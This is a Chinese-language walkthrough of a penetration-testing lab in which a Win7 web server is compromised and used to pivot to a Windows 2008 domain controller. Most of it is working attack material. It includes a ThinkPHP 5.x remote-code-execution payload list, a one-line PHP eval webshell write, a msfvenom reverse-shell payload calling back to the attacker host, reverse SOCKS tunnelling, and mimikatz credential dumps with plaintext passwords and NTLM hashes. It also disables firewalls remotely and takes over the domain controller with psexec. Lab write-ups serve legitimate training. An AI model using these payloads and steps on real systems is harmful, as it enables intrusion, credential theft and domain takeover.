目录
前言
靶机一共分为两台,一台win7模拟web服务器,一台windows 2008 用来模拟内网环境。win7可被当作跳板机。
win7
账号:sun\heart
密码:123.com
win7内域用户登录
账号:Administrator
密码:dc123.com
windows 2008 server
账号:sun\admin 2020.com
密码:2020.com
在打靶之前要先把win7 c盘内的phpstudy打开!
win7是双网卡,只需要将自己的nat网卡网段改为同win7一样的网段即可,也就是135!
外网渗透
信息收集
1、arp探测
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.135.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.135.1 00:50:56:c0:00:08 VMware, Inc.
192.168.135.2 00:50:56:ec:d1:ca VMware, Inc.
192.168.135.150 00:0c:29:ce:6e:f7 VMware, Inc.
192.168.135.254 00:50:56:e7:9c:50 VMware, Inc.
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.432 seconds (105.26 hosts/sec). 4 responded
2、nmap
端口探测
┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.135.150 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 09:53 CST
Nmap scan report for 192.168.135.150
Host is up (0.00061s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:CE:6E:F7 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds
信息收集
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -O -A -p 80,3306 192.168.135.150 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 10:11 CST
Nmap scan report for 192.168.135.150
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:CE:6E:F7 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 8.1 R1 (96%), Microsoft Windows Phone 7.5 or 8.0 (96%), Microsoft Windows Embedded Standard 7 (96%), Microsoft Windows Server 2008 or 2008 Beta 3 (92%), Microsoft Windows Server 2008 R2 or Windows 8.1 (92%), Microsoft Windows 7 Professional or Windows 8 (92%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (92%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (92%), Microsoft Windows 7 (90%), Microsoft Windows Server 2008 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.135.150
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.56 seconds
3、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.135.150
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.135.150
+ Target Hostname: 192.168.135.150
+ Target Port: 80
+ Start Time: 2024-01-09 10:14:52 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
+ /: Retrieved x-powered-by header: PHP/5.5.38.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OpenSSL/1.0.2j appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/2.4.23 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.5.38 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.5 - PHP 3/4/5 and 7.0 are End of Life products without support.
4、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.135.150
WhatWeb report for http://192.168.135.150
Status : 200 OK
Title : <None>
IP : 192.168.135.150
Country : RESERVED, ZZ
Summary : Apache[2.4.23], HTTPServer[Windows (32 bit)][Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38], OpenSSL[1.0.2j], PHP[5.5.38], Script[text/javascript], X-Powered-By[PHP/5.5.38]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.23 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Windows (32 bit)
String : Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38 (from server string)
[ OpenSSL ]
The OpenSSL Project is a collaborative effort to develop a
robust, commercial-grade, full-featured, and Open Source
toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as
a full-strength general purpose cryptography library.
Version : 1.0.2j
Website : http://www.openssl.org/
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 5.5.38
Version : 5.5.38
Google Dorks: (2)
Website : http://www.php.net/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/javascript
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/5.5.38 (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Tue, 09 Jan 2024 02:13:06 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 931
Connection: close
Content-Type: text/html; charset=utf-8
5、gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.135.150 -x php,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.135.150
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 931]
/index.php (Status: 200) [Size: 931]
/0 (Status: 200) [Size: 931]
/static (Status: 301) [Size: 238] [--> http://192.168.135.150/static/]
/add.php (Status: 200) [Size: 1643]
/Index (Status: 200) [Size: 931]
/Index.php (Status: 200) [Size: 931]
/robots.txt (Status: 200) [Size: 24]
/captcha (Status: 200) [Size: 1674]
/%20 (Status: 403) [Size: 210]
/INDEX (Status: 200) [Size: 931]
/INDEX.php (Status: 200) [Size: 931]
/Add.php (Status: 200) [Size: 1643]
===============================================================
Finished
===============================================================
6、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.135.150 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594
Output File: /root/kali/reports/http_192.168.135.150/_24-01-09_10-16-21.txt
Target: http://192.168.135.150/
[10:16:21] Starting:
[10:16:59] 404 - 236B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:17:02] 404 - 205B - /a%5c.aspx
[10:17:10] 200 - 2KB - /add.php
[10:18:42] 200 - 1KB - /favicon.ico
[10:19:37] 200 - 24B - /robots.txt
[10:19:48] 301 - 238B - /static -> http://192.168.135.150/static/
[10:19:48] 301 - 240B - /static.. -> http://192.168.135.150/static../
Task Completed
漏洞探测
ThinKPHP漏洞
当我们访问不存在的目录即可获取到框架的版本信息!
漏洞利用
利用searchsploit可以发现利用漏洞!5.0版本存在RCE漏洞!我们利用一下!
payload
┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 46150.txt
Exploit: ThinkPHP 5.X - Remote Command Execution
URL: https://www.exploit-db.com/exploits/46150
Path: /usr/share/exploitdb/exploits/php/webapps/46150.txt
Codes: N/A
Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /root/kali/46150.txt
┌──(root㉿ru)-[~/kali]
└─# cat 46150.txt
# Exploit Title: thinkphp 5.X RCE
# Date: 2019-1-14
# Exploit Author: vr_system
# Vendor Homepage: http://www.thinkphp.cn/
# Software Link: http://www.thinkphp.cn/down.html
# Version: 5.x
# Tested on: windows 7/10
# CVE : None
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
1、https://blog.thinkphp.cn/869075
2、https://blog.thinkphp.cn/910675
POC:
thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5
5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
thinkphp 5.0.21
6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5.1.*
8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
未知版本
16、?s=index/\think\module/action/param1/${@phpinfo()}
17、?s=index/\think\Module/Action/Param/${@phpinfo()}
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19、index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
21、index.php?s=/home/shopcart/getpriceNum/id/1%27
22、index.php?s=/home/user/cut/id/1%27
23、index.php?s=/home/service/index/id/1%27
24、index.php?s=/home/pay/chongzhi/orderid/1%27
25、index.php?s=/home/pay/index/orderid/1%27
26、index.php?s=/home/order/complete/id/1%27
27、index.php?s=/home/order/complete/id/1%27
28、index.php?s=/home/order/detail/id/1%27
29、index.php?s=/home/order/cancel/id/1%27
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#
thinkphp 5.0.23(完整版)debug模式
32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
thinkphp 5.0.23(完整版)
33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
thhinkphp 5.0.10(完整版)
34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system
框架的版本是5.0.22
我们利用此版本漏洞
thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
漏洞利用成功!说明存在此漏洞!我们可以写入木马然后利用蚁剑、冰蝎、菜刀连接!
get shell
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd
获取当前路径!
paylaod
echo "<?php @eval($_POST['shell']);?>" > C:\phpStudy\PHPTutorial\WWW\public\shell.php
把木马写到当前路径下的shell.php文件!
完整payload
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval($_POST[%27shell%27]);?%3E%22%20%3E%20C:\phpStudy\PHPTutorial\WWW\public\shell.php
内网渗透
信息收集
主机是win7
外网主机IP:192.168.135.150
内网IP:192.168.138.136
那么内网网段就是138
DNS是sun.com,DNS服务器的地址是:192.168.138.138
使用arp来查看当前网口的ip地址
可以发现138网段内还有内一个ip地址,那么这个IP地址也就是另一台内网主机了!
尝试ping DNS
回显的地址就是域控主机,也就是内网中另一台主机,IP是:192.168.138.138
信息收集的差不多就可以进行下一步了!这里有两种思路!
1、使用CS生成木马-监听-拿到shell
2、使用msf生成木马--监听--拿到shell
CS 启动!
CS连接
生成一个windows木马文件!
直接拖进去即可!
然后直接在命令行中启动即可!
cs就上线成功了!
CS信息收集
记得把会话返回时间改为0
成功拿到system最高权限啦!
怎么拿到密码呢
1、使用cs自带的hashdump
2、使用cs自带的猕猴桃 或者直接运行 logonpasswords 也是可以的!
1、hashdump
2、猕猴桃
得到外网主机的账号密码
leo 123.com
Administrator dc123.com 域管理员的账号
域是SUN
3、端口扫描
这样利用cs就能获取到内网主机的端口了!
MSF启动!
MSF木马生成
┌──(root㉿ru)-[~/kali]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.135.128 lport=1111 -f exe -o 1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: 1.exe
MSF监听模块
msf6 exploit(multi/script/web_delivery) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interfac
e may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.135.128
lhost => 192.168.135.128
msf6 exploit(multi/handler) > set lport 1111
lport => 1111
msf6 exploit(multi/handler) > run
生成的木马端口和ip一定要和监听端一样哈!
上传到蚁剑并运行即可反弹shell!
MSF信息收集
1、添加内网路由
前面我们信息收集到,内网ip网段为 192.168.138.0/24
run autoroute -s 192.168.138.0/24 添加内网路由
run autoroute -p 查看路由
2、引入本地流量
到这一步,我们就可以先把本地kali流量通过内网穿透工具带到内网!
我这里使用ew工具,也可以使用frpc、aliver等!
上传蚁剑 -- 运行 -- 建立连接成功
./ew_for_linux64 -s rcsocks -l 2222 -e 3333
ew_for_win.exe -s rssocks -d 192.168.135.128 -e 3333
rcsocks、rssocks用于反向连接
-l:指定本地监听端口
-e:指定转发流量端口
-d:指定连接主机
3、密码抓取
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Administrator SUN c8c42d085b5e3da2e9260223765451f1 e8bea972b3549868cecd667a64a6ac46 3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
WIN7$ SUN ad1f7aa2324f0629cc1dd6c9b8321924 38796bed48c38b20b659bf91ccf8a9f8c2ef57ee
leo SUN b73a13e9b7832a35aad3b435b51404ee afffeba176210fad4628f0524bfe1942 fa83a92197d9896cb41463b7a917528b4009c650
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator SUN dc123.com
WIN7$ SUN 8a ea 8b 0d 3e c9 83 64 9c 07 24 92 77 40 3f f0 5a bd e0 6f a2 0c ee 22 03 58 02 a4 20 a7 8f fa 8b 55 27 1d b3 a8 ac 4d 67 9c 80 a7 cd 99 8a 09 12 38 3f fd 59 54 77 24 60
a0 02 e7 e0 df c0 56 eb 12 fd 7a 80 af 92 2f 88 c7 8c 5c 67 ee 81 68 bd a9 02 ee a9 b4 97 db 52 5d 1e 23 95 e8 94 e3 51 9c 79 81 d4 9f 30 0e 29 0d be 3d 29 95 13 cc f8 f
e 97 0e 6c 3e bc 36 98 99 b7 66 7e 9d 98 af d0 e9 f4 14 86 d9 d0 8d 6a 48 e0 6d d6 9d 63 5e 46 b5 e9 de f5 45 05 a3 ea 60 0e de f8 9e 38 e1 53 e3 6c 4b f4 dc 8b 08 31 af
b3 b2 30 fb b3 32 78 ba b1 7a 2a 2d 11 f0 67 ee 4a 1a 45 81 53 63 15 b7 4d 78 8c a8 31 c6 51 93 9b 5a c9 0e db 13 f0 dd 39 52 f2 2a 65 37 00 56 ec a7 a0 fe ef 9d 89 46 4f
cf f2 9f 8a 90 96 74 ea e9 28 fa 49 ed
leo SUN 123.com
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Administrator SUN dc123.com
leo SUN 123.com
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator SUN.COM dc123.com
leo SUN.COM 123.com
win7$ SUN.COM 8a ea 8b 0d 3e c9 83 64 9c 07 24 92 77 40 3f f0 5a bd e0 6f a2 0c ee 22 03 58 02 a4 20 a7 8f fa 8b 55 27 1d b3 a8 ac 4d 67 9c 80 a7 cd 99 8a 09 12 38 3f fd 59 54 77 24 6
0 a0 02 e7 e0 df c0 56 eb 12 fd 7a 80 af 92 2f 88 c7 8c 5c 67 ee 81 68 bd a9 02 ee a9 b4 97 db 52 5d 1e 23 95 e8 94 e3 51 9c 79 81 d4 9f 30 0e 29 0d be 3d 29 95 13 cc f8
fe 97 0e 6c 3e bc 36 98 99 b7 66 7e 9d 98 af d0 e9 f4 14 86 d9 d0 8d 6a 48 e0 6d d6 9d 63 5e 46 b5 e9 de f5 45 05 a3 ea 60 0e de f8 9e 38 e1 53 e3 6c 4b f4 dc 8b 08 31
af b3 b2 30 fb b3 32 78 ba b1 7a 2a 2d 11 f0 67 ee 4a 1a 45 81 53 63 15 b7 4d 78 8c a8 31 c6 51 93 9b 5a c9 0e db 13 f0 dd 39 52 f2 2a 65 37 00 56 ec a7 a0 fe ef 9d 89 4
6 4f cf f2 9f 8a 90 96 74 ea e9 28 fa 49 ed
load kiwi -- getsystem -- creds_all
得到域管理员以及普通用户的账号以及密码:
win7:
Administrator dc123.com
leo 123.com
4、关闭防火墙
netsh advfirewall show allprofiles 查看防火墙的状态
netsh advfirewall set allprofiles state off 关闭防护墙
5、get win7
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
参数为1:开启服务
参数为0:关闭服务
登录成功!
6、get 域控
我们使用Psexec登录域控
在此之前,我们要先关闭防火墙
C:\phpStudy\PHPTutorial\WWW\public>net use \\192.168.138.138\ipc$ "1qaz@WSX" /user:"Administrator"
net use \\192.168.138.138\ipc$ "1qaz@WSX" /user:"Administrator"
The command completed successfully.
C:\phpStudy\PHPTutorial\WWW\public>sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
[SC] CreateService SUCCESS
C:\phpStudy\PHPTutorial\WWW\public>sc \\192.168.138.138 start unablefirewall
sc \\192.168.138.138 start unablefirewall
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:\phpStudy\PHPTutorial\WWW\public>
使用psexec模块
msf6 exploit(windows/smb/psexec) > options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.138.138 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain sun no The Windows domain to use for authentication
SMBPass 1qaz@WSX no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser administrator no The username to authenticate as
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.138.138 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > setg proxies socks5:127.0.0.1:2222
proxies => socks5:127.0.0.1:2222
事先开好代理,并把流量带到win7,在使用psexec时,开启全局代理!
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:65dc23a67f31503698981f2665f9d858:::
admin:1000:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
leo:1110:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:4062133d1d6015f7f64f9ee1c118eff0:::
WIN7$:1105:aad3b435b51404eeaad3b435b51404ee:ad1f7aa2324f0629cc1dd6c9b8321924:::
ok!拿到两台主机meterpreter之后就算完成靶机的渗透了!
权限维持,可以搜一下教程!也很简单!